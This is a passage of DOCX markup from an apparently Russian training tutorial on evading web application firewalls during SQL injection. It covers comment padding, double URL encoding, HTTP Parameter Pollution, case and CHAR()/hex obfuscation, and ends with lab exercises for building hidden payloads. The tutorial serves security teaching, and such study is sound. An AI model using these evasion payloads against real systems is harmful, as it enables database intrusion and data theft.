          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Не стоит забывать и о «мусорных» данных внутри комментариев. Сигнатурный анализ часто ограничен производительностью: WAF не может анализировать бесконечно длинные строки. Наполнение комментария огромным количеством случайных символов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/* + 1000 символов шума */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> может привести к тому, что анализатор «сдастся» и пропустит остаток пакета, чтобы не вызывать задержек в работе приложения. Это классическая атака на истощение ресурсов инспектора, где полезная нагрузка прячется в самом конце перегруженного буфера.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Вариативность кодировок и HTTP Parameter Pollution</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Второй мощный пласт техник — использование несоответствий в интерпретации кодировок. Когда браузер отправляет данные, WAF должен их декодировать, чтобы проверить на наличие угроз. Но что, если мы отправим данные в кодировке, которую WAF не понимает или интерпретирует неверно? Использование двойного URL-кодирования (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>%2527</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> вместо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>%27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — это классика, которая до сих пор работает на плохо настроенных системах. Более изощренный подход — использование Unicode-символов, которые при нормализации в базе данных превращаются в опасные символы. Например, некоторые версии драйверов при конвертации из UTF-8 в Latin-1 могут превращать символ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>¿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в обычную кавычку или другие управляющие знаки.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Техника HTTP Parameter Pollution (HPP) заслуживает отдельного внимания. Она основана на том, как разные веб-серверы обрабатывают повторяющиеся параметры в GET или POST запросе. Представьте запрос </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>id=1&amp;id=SELECT&amp;id=password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ASP.NET объединит их в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1,SELECT,password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP возьмет только последний: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF может проверить только первый параметр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и посчитать его безопасным.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Разбивая полезную нагрузку на части и распределяя её по нескольким одноименным параметрам, вы создаете ситуацию, в которой WAF видит разрозненные фрагменты («SELECT», «FROM», «users»), которые по отдельности не являются вредоносными. Однако после того, как приложение склеит эти части, база данных получит полнофункциональный деструктивный запрос. Это требует глубокого понимания стека технологий жертвы: вы должны точно знать, как именно серверное приложение собирает параметры воедино.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Практический кейс: Обход фильтрации через синтаксис функций</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Рассмотрим сценарий, где WAF блокирует слово </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Мы можем попытаться заменить его на эквивалентные по логике конструкции, которые не входят в стандартные списки блокировок. В некоторых случаях использование подзапросов в блоке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>WHERE</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FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> позволяет извлечь данные без использования </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Но если нам все же нужен именно этот оператор, мы можем прибегнуть к обфускации самого слова. В MySQL это может выглядеть как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UnIoN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (смена регистра — база нечувствительна, а простейший фильтр может быть чувствителен) или использование альтернативных функций для конкатенации строк, если фильтруется вывод.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Еще один эффективный метод — использование встроенных функций для сокрытия строк. Вместо того чтобы писать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SELECT 'password'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, мы пишем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SELECT CHAR(112, 97, 115, 115, 119, 111, 114, 100)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Здесь нет ни одной кавычки и ни одного подозрительного слова на английском. Если WAF не умеет выполнять базовые арифметические операции или декодировать функцию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CHAR()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, атака пройдет успешно. В базах данных типа MSSQL можно использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>EXEC(0x...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, передавая всю полезную нагрузку в шестнадцатеричном виде. Для системы защиты это выглядит как передача бинарного контента (например, картинки), а для СУБД это команда на выполнение закодированного скрипта.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Практическое задание</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ваша задача — отработать навыки конструирования скрытых нагрузок. Попробуйте выполнить следующие шаги в лабораторной среде или на тестовом стенде:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сформируйте запрос для извлечения версии базы данных (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>@@version</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version()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), используя вместо пробелов любые другие допустимые символы (комментарии, непечатные знаки).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Подготовьте вектор атаки, который не содержит ключевых слов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в явном виде (используйте кодирование </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HEX</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CHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или строковые функции вроде </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>REVERSE('NOINU')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Исследуйте поведение стенда при передаче параметров с одинаковыми именами. Выясните, как ваш локальный сервер (Apache/PHP или Nginx/Python) обрабатывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>?id=1&amp;id=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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WAF и база данных — это два разных парсера. Успех атаки кроется в использовании их разночтений.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Исполняемые комментарии (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/*! ... */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) — мощный инструмент для специфических атак на MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Непечатные символы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>%00</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%0B</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%0D%0A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) могут служить разделителями, невидимыми для регулярных выражений.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HTTP Parameter Pollution позволяет дробить нагрузку, обходя лимиты анализаторов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Использование функций </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CHAR()</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HEX()</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CONV()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>BASE64()</w:t>
      </w:r>
      <w:r>
